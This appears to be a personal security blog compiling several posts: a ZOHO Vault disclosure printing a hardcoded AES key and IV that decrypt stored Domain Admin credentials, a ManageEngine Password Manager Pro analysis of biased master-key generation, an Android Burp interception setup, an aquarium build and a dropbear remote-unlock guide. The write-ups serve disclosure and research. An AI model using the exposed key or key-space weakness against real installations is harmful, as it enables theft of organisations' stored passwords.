The second 0DayAllDay event was June 9th, 2018 from 10am to 9pm. It was organized by Spectant Security and Blackmarble.sh. More information on 0DayAllDay can be found here

Last 0DayAllDay event was focused around Password Managers, Thycotic, Keeper, ZOHO Vault were a some of the targets. Only bug that was found was for ZOHO Vault.

ZOHO Vault is an online password manager focused on businesses. Included in their software is a AD/LDAP provisioning application. The application ask some standard question like your master ZOHO Account Username and Password, Domain Administrator (What isn't really needed) Username and Password, connection details. After you fill this out, Application connects to the Domain Controller and you select the users you want to import into ZOHO Vault.

The AD/LDAP provisioning application stores the AES encryption key and IV in the source code. Obtaining these strings is trivial. You can use JetBrains.dotPeek for example to decompile the executable.

Once decompiled, you can see that Provisioning_Utils namespace has a CryptUtil class that uses a static string for both the Key and IV.

namespace Provisioning_Utils
{
    public class CryptUtil
{
private static UTF8Encoding encoding = new UTF8Encoding();
private static byte[] kBytes = CryptUtil.encoding.GetBytes("6ZUJiqpBKHuNuS@*");
private static byte[] tmpIV = CryptUtil.encoding.GetBytes("BJLTHGVTPJQMDEXO");

The vault.zoho.com account password and the Windows Administrator account password are stored in the provisioning.conf file as encrypted text. The Provisioning application can be ran on any computer on the domain. Access to this provisioning.conf file is not guaranteed to be protected. It some cases it would be fairly easy for unauthorized access to the provisioning.conf file.

I have successfully wrote a new standalone program that takes the encrypted text as an argument and decrypts the password showing the plain text password.

First, C# program I have made. It was pretty easy, just needed to copy and paste the decompiled code. Googled a few things, and surprisingly got it to build on the second try.

For full source code and binary check out my GitHub

You do need some other access to exploit this; however, for pentesters if they find this provisioning.conf file game over. Gain access to all the passwords saved on ZOHO Vault (Edit: You need a secondary password to decrypt the Vault) and have Domain Admin. It was reckless to have the keys to your kingdom so easily available.

ZOHO issued me their own CVE number: ZVE-2018-0976

Disclosure Timeline:
Found Vulnerability: June 8th, 2018
Disclosed to ZOHO: June 10th, 2018
ZOHO Closed: July 12th, 2018

Reward: Nothing :( 10 stupid points. I can't buy beer with points.

EDIT:

ZOHO Updates Ticket: July 13th, 2018

Reward: $100 and 10pts. We have beer money for the next event now.

After making a post I like to watch Google Analytics for my blog just to see the kind of response I get. Got a couple referrals from supportlab.zoho.com and docs.zoho.com less than a hour from posting on twitter. I think they have a twitter bot looking for their name. Anyways, they updated the ticket I had open with them.

It is true, I had an error. Even though you have the ZOHO Vault login password, you need a secondary encryption password to get access to the content (View Passwords).

They fixed the vulnerability by removing the unneeded ZOHO account password and using dynamic unique keys to encrypt scoped authentication token and AD Password for every installation.

Finial notes:

What this tells me is the Authentication token doesn't expire I thought this was true as I played around with it as well. Which was clear text before in the provisioning.conf. Now I am interested in the new way they are doing the keys. I'll have to take another look when I get some time.

For the 0DayAllDay event a friend and I are hosting June 9th 2018. I needed to setup a handful of Android virtual machines. Since we will be hacking on Password Managers and their associated Android apps. I didn't want people wasting their time setting up Android to work with Burp Suite. Especially since it can be difficult with information so spread out. I thought it would be good to centralize the information I needed to get a working Android Hacking Environment setup.

I won't be doing a step by step guide (Plenty of those out there). I am assuming the audience knows how to setup virtual machines. Just highlighting the important stuff.

Hypervisor I use is Proxmox (Qemu/kvm). I'm sure the steps will be fairly similar for other Hypervisors.

For the Android Operating System I will be using android-x86 specifically 'android-x86_64-7.1-r2.iso'

Create a virtual machine, I used the following:

• 4 vCPU kvm64 (2 vCPU should be work fine)
• 2 GB Memory
• 15 GB Storage VirtIO SCSI
• Use tablet for pointer should be set to 'No' for the mouse to work correctly.

Once you load up the android-x86 iso, start the virtual machine up. For details regarding the install, reference their documentation here. During the install it will ask if you want to install /system directory as read-write. Choose 'Yes' here. This will make everything easier.

Once the install is complete reboot.

The mouse pointer is most likely going to be off from your host mouse. It's annoying but it works.

Just like any Android, on first boot you need to setup everything.

For Proxmox to use another VNC client instead of the built in console follow the steps here. I prefer to use Remmina VNC client.

Now that you have a working Android virtual machine setup we can start to have fun.

There are two ways to get to the Android shell. On the VM Console you can hit ALT+F1 and it will switch tty's. The other way is ADB shell. For more information on how to connect via ADB shell see their documentation here.

To intercept traffic with Burp Suite you first need to download the CA Certificate. On the host computer go to http://proxyAddress:8080 in the top right hand corner click on 'CA Certificate'. Save cacert.der somwhere on your computer.

The certificate needs to be in PEM format. To do this run the following:

openssl x509 -inform der -in cacert.der -out cacert.pem

Next, you need to get the hash of the certificate. To do this run the following:

openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1

You will get something similar to 9a5ba575

Now we need to write the contents of cacert.pem to a new file using this hash and an extension of .0

cat cacert.pem > 9a5ba575.0

Now we need to export the PEM information into the bottom of this new file.

openssl x509 -inform PEM -text -in cacert.pem -out /dev/null >> 9a5ba575.0

These steps were stolen from here; however, to add value I made a one liner command.

openssl x509 -inform der -in cacert.der -out cacert.pem; cat cacert.pem >> $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1).0;openssl x509 -inform PEM -text -in cacert.pem -out /dev/null >> ????????.0

Now that we have the CA certificate in a format that will be recognized by Android System. You just need to push the certificate with adb.

Obtain the IP address of the virtual machine. I just flip to tty1 ALT+F1 and run ifconfig.

Once you have the IP Address. Start adb as root.

adb root

Next, connect to the virtual machine.

adb connect <ip address>

Then push the certificate. Replacing the certificate name with yours.

adb push 9a5ba575.0 /system/etc/security/cacerts/

Last thing to do is set the correct permissions. First open a adb shell.

adb shell

Then run:

chmod 644 /system/etc/security/cacerts/9a5ba575.0

Reboot and your certificate will now be trusted.

Unfortunately, this isn't the end of the story. You now need to get the traffic from the virtual machine to Burp Suite. Because there isn't a wifi controller in the VM, the standard tools like ProxyDroid, or the system wifi proxy won't work. You will need to use iptables.

Open adb shell as root and run the following: (Replacing the BURP_HOST and BURP_PORT with the correct information for your configuration)

iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination BURP_HOST:BURP_PORT
iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination BURP_HOST:BURP_PORT

In Burp suite under Proxy -> Options -> Proxy Listeners. Edit your Proxy Listener. Under the Binding tab, set 'Bind to address:' to either 'All interfaces' or 'Specific address'. So that the proxy listener can accept connections from the Android VM.

Next, under the Request handling tab, select 'Support invisible proxying'

That is it, you should now be able to successfully man in the middle your android device. I test this by opening up Google Play and download an Application.

Bonus

If you need to delete your iptables you can either reboot or run the following.

First get the line number of the rule you want to delete.

iptables -t nat -nvL --line-numbers

Once you have the line number delete it with:

iptables -t nate -D OUTPUT #

To download an APK from Google Play to your workstation I use gplaycli what can be found here. Best tool i've found for this. You don't need to give your gmail creds or device ID.

To decompile the APK to source I use this online tool which uses Jadx. It's easy and the APK's are already public so it's not like you are uploading sensitive data.

Weak Master Encryption Key Generation.

This is a public disclosure, WHAT? It's okay, I feel like public disclosure in this scenario is okay for a couple reasons. One, even though the flaw is serious it still leaves the customers with enough protection against most people. Two, all of ManageEngine products seems to have a few vulnerabilities due to lack of effort. Why should I go through the extra effort getting them to fix code that shouldn't be broken in the first place. I feel like the public should know. Really the only people that can still crack the encryption key is state sponsored actors.

Below I show my process of how I tracked down the function that generates the Master Encryption Key.

After installing ManageEngine Password Pro evaluation copy. Started poking around, one of the first items I went looking for was the encryption key that encrypts the data in the database. The Encryption key can be found here:

~/ManageEngine/PMP/conf/pmp_key.key

Contents of pmp_key.key

#This file contains the master AES encryption key for this installation, automatically generated by Password Manager Pro.
#The default location of this file is <PMP_HOME>conf and it is not secure to leave this file here, unless
#the server is sufficiently hardened to protect any illegal access of this file.
#It is highly recommended to move this file out of its default location and for instructions to securely store this file refer.
#Thu Nov 30 13:48:09 CST 2017
ENCRYPTIONKEY=x7J2821f*831*7ub*oXVsJsHbeTbmaZY

Awesome, Now how is the key made.

Found a helper tool in /bin/ called 'RotateKey.sh'. Which is used as a helper script to rotate the master key.

Looking at 'RotateKey.sh'

../jre/bin/java -Dswing.aatext=true -Djsse.enableCBCProtection=false -Djava.library.path=../lib/native  -Dserver.dir="$SERVER_HOME" -Dserver.home="$SERVER_HOME" -cp "$CLASS_PATH" com.adventnet.pmp.PMPStarter "com.adventnet.passtrix.utils.RotateKey" "rotatekey"

You can see which java file handles this function "com.adventnet.passtrix.utils.RotateKey"

Using cfr.jar you can decompile all the Java files. I typically just decompile them all into one directory so it keeps the file structure.

find . -name '*.jar' -exec java -jar /opt/cfr.jar --outputdir output/ {} \;

After that magic runs, its time to find the RotateKey function. Its located here:

~/ManageEngine/PMP/output/com/adventnet/passtrix/utils/RotateKey

Looking at this code you see the libraries imported and the function call.

import com.adventnet.mfw.ConsoleOut;
import com.adventnet.passtrix.role.RoleConstants;
import com.adventnet.passtrix.utils.KeyRotationUtils;
import com.adventnet.passtrix.utils.StandAloneUtils;
...
else {
                KeyRotationUtils.rotatePasswords();

Next in the chain, look at "com.adventnet.passtrix.utils.KeyRotationUtils;". Find the rotatePasswords() function and looked for what might be getting or setting the key.

PMPAPI.initializePMPED();
String oldKey = PMPAPI.get32BitKey();
ClientUtil.setPMPMasterKey();
if (!KeyRotationUtils.backupDatabase()) {
    ConsoleOut.println((String)PMPApplicationResourcesUtil.getMsg(rb, "java.KeyRotationUtils.Error_backup", null));
    throw new Exception("Error occurred while taking backup of the database.");
}
String new256BitKey = KeyRotationUtils.createPMPEncryptKey();
pmpEncryptDecrypt = KeyRotationUtils.getNewPMPEDInstance();

Here you see the 'createPMPEncryptKey();'. Searching for this in the same file you find the following:

public static String createPMPEncryptKey() throws Exception {
    String generatedKey = null;
    ...
    generatedKey = PasswordGenerator.generatePassword(32, 32, true, true, 3, true, true);
    String keyFile = PMPAPI.getConfKeyPath();
    ...
    try {
        File f = new File(keyFile);
        Properties props = new Properties();
        props.load(new FileInputStream(f));
        String oldKey = props.getProperty("ENCRYPTIONKEY");
        String comments = "#OLDENCRYPTIONKEY=" + oldKey;
        Properties properties = new Properties();
        properties.setProperty("ENCRYPTIONKEY", generatedKey);
        key = new BufferedWriter(new FileWriter(keyFile));
        ...
        log.log(Level.INFO, "Encryption key file has been updated with the new key successfully.");
        String string = generatedKey;
        return string;
    }
    ...

Alright, Getting closer. 'PasswordGenerator.generatePassword(32, 32, true, true, 3, true, true);' Matches the size of the key in the pmp_key.key file above. If you run 'RotateKey.sh' you get the line that says #OLDENCRYPTIONKEY. Now we need to find PasswordGenerator.generatePassword()

It's located in the same directory. After opening 'PasswordGenerator.java'. Look for generatePassword(). There are a couple functions named generatePassword(). Just need to match up with the arguments to the expected arguments to find the correct one. Below is the function it calls. I added my notes below marked with ##comment

## Min and Max Password length is 32.
## Mixed Case is required
## Special Chars are required
## 3 Special chars
## Must start with Letter
## Must have numbers
public static String generatePassword(int minPassLen, int maxPassLen, boolean mixedCaseRqd, boolean splCharRqd, int noOfSplChar, boolean startWithLetter, boolean isNumber) {
    ## Sets up 4 Arrays for lower case, upper case, digits, and special chars.
    ## As you can see they aren't using all the special chars.
    
    char[] alpha = new char[]{'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'};
    char[] upperAlpha = new char[]{'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'};
    char[] numeric = new char[]{'0', '1', '2', '3', '3', '4', '5', '6', '7', '8', '9'};
    char[] splchar = new char[]{'@', '$', '-', '%', '&', '*', '(', ')', '=', '^'};
    int passMinLength = 0;
    ## Starts with letter increase passMinLength
    if (startWithLetter) {
        ++passMinLength;
    }
    ## Has mixed case and startWithLetter is true so adding 2, total is 3 now.
    if (mixedCaseRqd) {
        passMinLength = !startWithLetter ? (passMinLength += 2) : ++passMinLength;
    }
    ## is True so add 1, total is 4
    if (isNumber) {
        ++passMinLength;
    }
    ## Is True so add number of special char what is 3, total 7.
    if (splCharRqd) {
        passMinLength += noOfSplChar;
    }
    ## Verify that minPassLen is large enough to meet requirements, If not, increase minPassLen.
    if (minPassLen < passMinLength) {
        minPassLen = passMinLength;
    }
    ## Verify that maxPassLen is large enough, if not Increase.
    if (maxPassLen < passMinLength) {
        minPassLen = maxPassLen;
    }
    
    ## more checks and gets the password length to generate. In our case its always 32.
    int passLen = PasswordGenerator.getPasswordLength(minPassLen, maxPassLen);

Now the fun begins:

    ## Setup string buffer to hold chars being generated. 
    StringBuffer password = new StringBuffer(passLen);
    
    ## Upper case count.
    int iCount = 0;
    
    ## This little guy is called a Ternary. I had to ask a friend. Not a Java Programer I guess it was frist used in C and someother languages.
    ## If splChar equals True and number of special is greater than 0 types = 3 else if number of special chars 0 or less, types = 2
    ## type 1 = pick a lower or upper case alpha
    ## type 2 = pick a number
    ## type 3 = pick a special char
    int types = splCharRqd && noOfSplChar > 0 ? 3 : 2;
    
    int splCharsAdded = 0;
    boolean toggleCase = false;
    int mixedCount = 0;
    
    ## This is the start of the password generation.
    
    block5 : for (int i = 0; i < passLen; ++i) {
        ## arrayId determines which array to pick from.
        int arrayId = 0;
        ## First round if startWithLetter is True use case 0
        if (i == 0 && startWithLetter) {
            arrayId = 0;
            
        ## If isNumber use case 1 
        ## Because isNumber = True. The second round will always be a number. 
        } else if (isNumber) {
            isNumber = false;
            arrayId = 1;
            
        ## For each round after the second round, if mixed case is required and mixedCount equals 0 use case 0 and increase mixedCount.
        ## Third Round will always be alpha. Below it shows it will always be Uppercase.
        } else if (mixedCaseRqd && mixedCount == 0) {
            arrayId = 0;
            ++mixedCount;
            
        ## If special char required and number of special chars is greater than 0. Then check if special charsAdded is less than number of special chars. If so, do some crazy stuff. 
        ## skip rounds 1 and 2 because thats caught above. 
        ## round 3
            ## 32 - 3 == 3 - 0 (False so arrayId = random(0,2) aka 0,1, or 2.
        ## round 4
            ## 32 - 4 == 3 - 0 (False so arrayId = random(0,2)
        ## blah blah, Its there way of making sure that the required amount of specials chars is added before running out of password length. If the statement is true arrayId = 2 else you are picking a random number between 0 and 2.
        } else if (splCharRqd && noOfSplChar > 0) {
            if (splCharsAdded < noOfSplChar) {
                arrayId = passLen - i == noOfSplChar - splCharsAdded ? 2 : sRnd.nextInt(types);
            ## After the password has the required amount special chars, change types to equal 2. Removing the option to pick special chars.
            } else {
                types = 2;
            }
            
        ## If none of the above is triggered pick a type.    
        } else {
            arrayId = sRnd.nextInt(types);
        }
        switch (arrayId) {
            ## Case 0 is for lower and upper case.
            case 0: {
                ## Pick a random char from lower and upper case array.
                int alphaIdx = sRnd.nextInt(alpha.length);
                int upperAlphaIdx = sRnd.nextInt(upperAlpha.length);
                ## If not mixed case it just uses lower case.
                if (mixedCaseRqd) {
                    ## First round always use lower case.
                    if (i == 0) {
                        password.append(alpha[alphaIdx]);
                        continue block5;
                    }
                    ## All other rounds pick a random int 0 or 1
                    ## 0 = Uppercase
                    ## 1 = Lowercase
                    int charCase = sRnd.nextInt(2);
                    
                    ## If there are no upper case chars yet, Force Upper case. Because a number is always in the second position. The third char position is always Upper case. 
                    if (iCount == 0) {
                        charCase = 0;
                    ## When the next alpha case 0 is picked it has to be a lower case because toggleCase = False. Meaning 4th char position can never be Uppercase. Uppercase can't be picked until case 0 is picked and sets the toggleCase to True. So position 5 - 10 are less likely to be uppercase.
                    } else if (!toggleCase) {
                        charCase = 1;
                        toggleCase = true;
                    }
                    
                    ## Once a lower case is choosen. It will either be a zero and this will add a upper case char and increase the uppercase counter or if one is picked it will move on to the next section.
                    if (charCase == 0) {
                        password.append(upperAlpha[upperAlphaIdx]);
                        ++iCount;
                        continue block5;
                    }
                   ## if One is picked it will add lowercase. 
                   password.append(alpha[alphaIdx]);
                    continue block5;
                }
                ## Never used as mixedCaseRqd = True
                password.append(alpha[alphaIdx]);
                continue block5;
            }
            case 1: {
                ## If Case one is picked it will add a number to the password. Numbers tend not to exist towards the end of the password.
                int numIdx = sRnd.nextInt(numeric.length);
                password.append(numeric[numIdx]);
                continue block5;
            }
            case 2: {
                ## If case 2 is picked add special char to the password. Increase special chars added. Case 2 can only be choosen when specialCharsAdded is less than Number of Specials which is 3. Special chars favors the start of the password.
                int splCharIdx = sRnd.nextInt(splchar.length);
                password.append(splchar[splCharIdx]);
                ++splCharsAdded;
            }
        }
    }
    return password.toString();
}

So from reading the code we know a few things. First position will always be a lower case char. Second position will always be a digit. Third position will always be upper case char. Forth position can't be a upper case. Special chars will favor the first half the encryption key.

I know that might have been confusing. The developers made it way to complex, They were trying to ensure randomness but by doing so cut massive amount of the key space.

Remember boys and girls, NEVER limit what chars can be part of a password as this lowers your entropy.

I wanted to test my theory, I don't code in Java so I didn't want to pull the code out. So I wrote BASH script to execute the RotateKey.sh, read the pmp_key.key file and extract the encryption key and save it in a file. Looping thousands of times.

#!/bin/bash

count=5000
while [ $count -gt 0 ]
do
    ./RotateKey.sh
    grep 'ENCRYPTIONKEY=' ../conf/pmp_key.key | cut -d'=' -f2- >> keys.log
done

Next, I wrote a python program to analyze the data.

import re
import sys
import os

def run():
    with open('keys.log', 'r') as f:
        data = f.readlines()

    mask = {1: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            2: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            3: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            4: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            5: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            6: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            7: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            8: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            9: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            10: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            11: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            12: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            13: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            14: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            15: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            16: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            17: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            18: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            19: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            20: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            21: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            22: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            23: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            24: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            25: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            26: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            27: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            28: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            29: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            30: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            31: {'l': 0, 'u': 0, 'd': 0, 's': 0},
            32: {'l': 0, 'u': 0, 'd': 0, 's': 0}
            }

    alpha_freq = {'a': 0,
                  'b': 0,
                  'c': 0,
                  'd': 0,
                  'e': 0,
                  'f': 0,
                  'g': 0,
                  'h': 0,
                  'i': 0,
                  'j': 0,
                  'k': 0,
                  'l': 0,
                  'm': 0,
                  'n': 0,
                  'o': 0,
                  'p': 0,
                  'q': 0,
                  'r': 0,
                  's': 0,
                  't': 0,
                  'u': 0,
                  'v': 0,
                  'w': 0,
                  'x': 0,
                  'y': 0,
                  'z': 0
                  }
    number_freq = {'0': 0,
                   '1': 0,
                   '2': 0,
                   '3': 0,
                   '4': 0,
                   '5': 0,
                   '6': 0,
                   '7': 0,
                   '8': 0,
                   '9': 0
                   }
    special_freq = {'@': 0,
                    '$': 0,
                    '-': 0,
                    '%': 0,
                    '&': 0,
                    '*': 0,
                    '(': 0,
                    ')': 0,
                    '=': 0,
                    '^': 0
                    }
    for line in data:
        idx = 1
        for x in line.strip('\n'):
            if x.islower():
                char_type = 'l'
                alpha_freq[x] += 1

            elif x.isupper():
                char_type = 'u'
                alpha_freq[x.lower()] += 1

            elif x.isdigit():
                char_type = 'd'
                number_freq[x] += 1

            else:
                char_type = 's'
                special_freq[x] += 1

            mask[idx][char_type] += 1
            idx += 1

    for k,v in mask.iteritems():
        print(k,v)

    for k,v in alpha_freq.iteritems():
        print(k,v)

    for k,v in number_freq.iteritems():
        print(k,v)

    for k,v in special_freq.iteritems():
        print(k,v)

if __name__ == '__main__':
    run()

Now for the results.

Count of type per position:

My friend @bxrobertz thought my raw numbers could use a facelift, so he created some nice charts for me.

(1, {'s': 0, 'u': 0, 'l': 4712, 'd': 0})
(2, {'s': 0, 'u': 0, 'l': 0, 'd': 4712})
(3, {'s': 0, 'u': 4712, 'l': 0, 'd': 0})
(4, {'s': 1601, 'u': 0, 'l': 1579, 'd': 1532})
(5, {'s': 1619, 'u': 261, 'l': 1314, 'd': 1518})
(6, {'s': 1546, 'u': 446, 'l': 1152, 'd': 1568})
(7, {'s': 1511, 'u': 533, 'l': 1134, 'd': 1534})
(8, {'s': 1332, 'u': 815, 'l': 1165, 'd': 1400})
(9, {'s': 1230, 'u': 1027, 'l': 1224, 'd': 1231})
(10, {'s': 1031, 'u': 1240, 'l': 1345, 'd': 1096})
(11, {'s': 875, 'u': 1398, 'l': 1484, 'd': 955})
(12, {'s': 759, 'u': 1573, 'l': 1594, 'd': 786})
(13, {'s': 590, 'u': 1752, 'l': 1758, 'd': 612})
(14, {'s': 444, 'u': 1851, 'l': 1895, 'd': 522})
(15, {'s': 368, 'u': 1957, 'l': 1981, 'd': 406})
(16, {'s': 295, 'u': 2031, 'l': 2083, 'd': 303})
(17, {'s': 250, 'u': 2115, 'l': 2097, 'd': 250})
(18, {'s': 158, 'u': 2158, 'l': 2209, 'd': 187})
(19, {'s': 154, 'u': 2202, 'l': 2229, 'd': 127})
(20, {'s': 120, 'u': 2329, 'l': 2180, 'd': 83})
(21, {'s': 55, 'u': 2277, 'l': 2314, 'd': 66})
(22, {'s': 62, 'u': 2251, 'l': 2358, 'd': 41})
(23, {'s': 38, 'u': 2362, 'l': 2273, 'd': 39})
(24, {'s': 28, 'u': 2310, 'l': 2346, 'd': 28})
(25, {'s': 25, 'u': 2306, 'l': 2364, 'd': 17})
(26, {'s': 10, 'u': 2377, 'l': 2308, 'd': 17})
(27, {'s': 5, 'u': 2341, 'l': 2352, 'd': 14})
(28, {'s': 10, 'u': 2355, 'l': 2341, 'd': 6})
(29, {'s': 5, 'u': 2349, 'l': 2357, 'd': 1})
(30, {'s': 5, 'u': 2358, 'l': 2346, 'd': 3})
(31, {'s': 3, 'u': 2398, 'l': 2307, 'd': 4})
(32, {'s': 7, 'u': 2354, 'l': 2351, 'd': 0})

Char frequency:

('a', 4446)    ('c', 4589)     ('b', 4416)     ('e', 4459)
('d', 4572)    ('g', 4515)     ('f', 4544)     ('i', 4502)
('h', 4539)    ('k', 4430)     ('j', 4467)     ('m', 4579)
('l', 4494)    ('o', 4553)     ('n', 4454)     ('q', 4539)
('p', 4669)    ('s', 4499)     ('r', 4463)     ('u', 4521)
('t', 4678)    ('w', 4531)     ('v', 4434)     ('y', 4595)
('x', 4488)    ('z', 4614)     
('1', 1772)    ('0', 1733)     ('3', 3436)     ('2', 1780)
('5', 1656)    ('4', 1755)     ('7', 1738)     ('6', 1751)
('9', 1673)    ('8', 1764)

('@', 1380)    ('%', 1443)     ('$', 1414)     ('=', 1435)
('&', 1377)    (')', 1369)     ('(', 1434)     ('*', 1415)
('-', 1464)    ('^', 1405)

Is this the end of the world? No. However, I wouldn't trust a company that makes this kind of mistakes. This is spouse to be a password manager that protects all your passwords for your company. If someone was able to steal the password manager database with enough time I believe the bad actor could crack the password and gain access to all the sensitive information.

This isn't the first time I picked on ManageEngine and wont be the last. I got 3 CVE's on ManageEngine EventLog Analyzer you can check out that Blog entry here

Made great progress upgrading my tank. Some more work still needs to be done. however, I needed to get it laid out the best I could so I can see what other improvements are needed. Using 2.2mm acrylic that I bought from home depot; I made top pieces, basking area for Sammy, divider to separate Sammy and the fish, and a gravel retaining wall. Using the laser cutter from TheLab.ms (local Plano, TX makerspace) I was able to cut everything out.

On the fish side I used black gravel and planted some plants. On the turtle side I used black sand as gravel can hurt or kill a turtle if they decide to eat it (Hint: They will). I placed some larger river rocks and some fake plants. Some turtles will eat the fake plants, Sammy has been pretty good and hasn't tried to yet. The device on the right hand side is a electric flow fan to circulate the water. The fan and light are hooked up to a z-wave power strip that is controlled by my computer. Light turns on at 7:30am and turns off at 10:00pm. The fan turns on every 10 minutes for 1 minute. This is because Sammy doesn't really like it that much but I need better water circulation so we came to a compromise. Also, have a nice adjustable heater to keep the fish and Sammy warm. Just got a new SunSun HW-704B 525 GPH 5-Stage Canister Filter. I'll be hooking the new pump up shortly and run both at the same time until the new filter has a chance to build up good bacteria.

Now onto some action shots.

This is a picture of the gravel retaining wall and just on the other side two amazing bottles Laphroaig 10 Year Scotch and Zacapa 23 year Rum is hold down a 5mm x 192mm acrylic strip glued down with aquarium safe silicone. The divider seats inbetween the gap of the acrylic strip and retaining wall so it can swing out.

Close up of the fish side. (Not Sushi please don't eat)

Some close up shots of the turtle side

To build the basking area I attached each piece to each other using electric tape. Electric tape applies tension as it tries to shrink what helps keep everything tight while you weld them together using Weldon #4 Acrylic solvent

Some close up shots of the turtle basking area.

After I set up the basking area I realized the 50mm safety wall that extends out wont work well enough. I will make another cage that fits going the other direction. Until then, I placed some acrylic scraps to ensure he doesn't try to climb out.

Used the astro turf from home depot. Unfortunately its not working out well. I need to find some better quality astro turf. Sammy has been pulling the green grass off and causing a mess.

Its hard to see here but I etched Samuel L. Jackson into the acrylic divider along with two turtles. It was fun to watch the laser cutter cut all those holes.

Here is a screenshot of the design from the laser cutter software.
In person, it looks great. Just hard to take a picture through glass and water.

Some actions shots of Sammy enjoying his new tank setup.

Next, I am going to change the ramp to the basking area. Where the ramp currently ends it will extend all the way to the glass horizontally creating a platform just below the water surface and turns back onto its self with a second ramp going deeper into the water. This should give Sammy a nice safe area to sleep at night. After the ramp is made I'll be making the other side of the basking area so he can't climb out.

Having Full Disk Encryption for your VPS or remote server is nice, however if you don't have local terminal or out-of-band access via IPMI/iLO the only way to unlock the root partation is to use SSH on boot.

The steps outlined here will show how to configure your server to unlock your encrypted drives remotely. Steps here are for Ubuntu 16.04 and were collected from several stack exchange answers and MAN pages.

Server Configuration

Install dropbear and busybox:
sudo apt install dropbear busybox

Edit dropbear set NO_START=0 and change hostkey paths.
sudo vi /etc/default/dropbear

Should look like the following:

# disabled because OpenSSH is installed
# change to NO_START=0 to enable Dropbear
NO_START=0
# the TCP port that Dropbear listens on
DROPBEAR_PORT=22

# any additional arguments for Dropbear
DROPBEAR_EXTRA_ARGS=

# specify an optional banner file containing a message to be
# sent to clients before they connect, such as "/etc/issue.net"
DROPBEAR_BANNER=""

# RSA hostkey file (default: /etc/dropbear/dropbear_rsa_host_key)
DROPBEAR_RSAKEY="/etc/initramfs-tools/etc/dropbear/dropbear_rsa_host_key"

# DSS hostkey file (default: /etc/dropbear/dropbear_dss_host_key)
DROPBEAR_DSSKEY="/etc/initramfs-tools/etc/dropbear/dropbear_dss_host_key"

# ECDSA hostkey file (default: /etc/dropbear/dropbear_ecdsa_host_key)
DROPBEAR_ECDSAKEY="/etc/initramfs-tools/etc/dropbear/dropbear_ecdsa_host_key"

# Receive window size - this is a tradeoff between memory and
# network performance
DROPBEAR_RECEIVE_WINDOW=65536

Next, Setup directory structure.
sudo mkdir -p /etc/initramfs-tools/root/.ssh

Create new dropbear private key.
sudo dropbearkey -t rsa -f /etc/initramfs-tools/root/.ssh/id_rsa.dropbear

Convert dropbear key to openssh format.
sudo /usr/lib/dropbear/dropbearconvert dropbear openssh /etc/initramfs-tools/root/.ssh/id_rsa.dropbear /etc/initramfs-tools/root/.ssh/id_rsa

Extract the public key from dropbear formated key.
sudo dropbearkey -y -f /etc/initramfs-tools/root/.ssh/id_rsa.dropbear | grep "^ssh-rsa " > /etc/initramfs-tools/root/.ssh/id_rsa.pub

Put the public key into authorized_keys.
sudo cat /etc/initramfs-tools/root/.ssh/id_rsa.pub >> /etc/initramfs-tools/root/.ssh/authorized_keys

Create new hook script.
sudo vi /etc/initramfs-tools/hooks/crypt_unlock.sh

#!/bin/sh

PREREQ="dropbear"

prereqs() {
echo "$PREREQ"
}

case "$1" in
prereqs)
prereqs
exit 0
;;
esac

. "${CONFDIR}/initramfs.conf"
. /usr/share/initramfs-tools/hook-functions

if [ "${DROPBEAR}" != "n" ] && [ -r "/etc/crypttab" ] ; then
cat > "${DESTDIR}/bin/unlock" << EOF
#!/bin/sh
if PATH=/lib/unlock:/bin:/sbin /scripts/local-top/cryptroot; then
kill \`ps | grep cryptroot | grep -v "grep" | awk '{print \$1}'\`
# following line kill the remote shell right after the passphrase has
# been entered.
kill -9 \`ps | grep "\-sh" | grep -v "grep" | awk '{print \$1}'\`
exit 0
fi
exit 1
EOF

chmod 755 "${DESTDIR}/bin/unlock"

mkdir -p "${DESTDIR}/lib/unlock"
cat > "${DESTDIR}/lib/unlock/plymouth" << EOF
#!/bin/sh
[ "\$1" == "--ping" ] && exit 1
/bin/plymouth "\$@"
EOF

chmod 755 "${DESTDIR}/lib/unlock/plymouth"

echo To unlock root-partition run "unlock" >> ${DESTDIR}/etc/motd

fi

Make script executable.
sudo chmod +x /etc/initramfs-tools/hooks/crypt_unlock.sh

Edit initramfs.conf
sudo vi /etc/initramfs-tools/initramfs.conf

Set BUSYBOX=y

Add DROPBEAR=y right under BUSYBOX=y

Right under DEVICE= line add the following:
IP=11.111.11.214::11.111.11.222:255.255.255.240::ens160:off

Note: Keep DEVICE= unassigned otherwise it wont work.
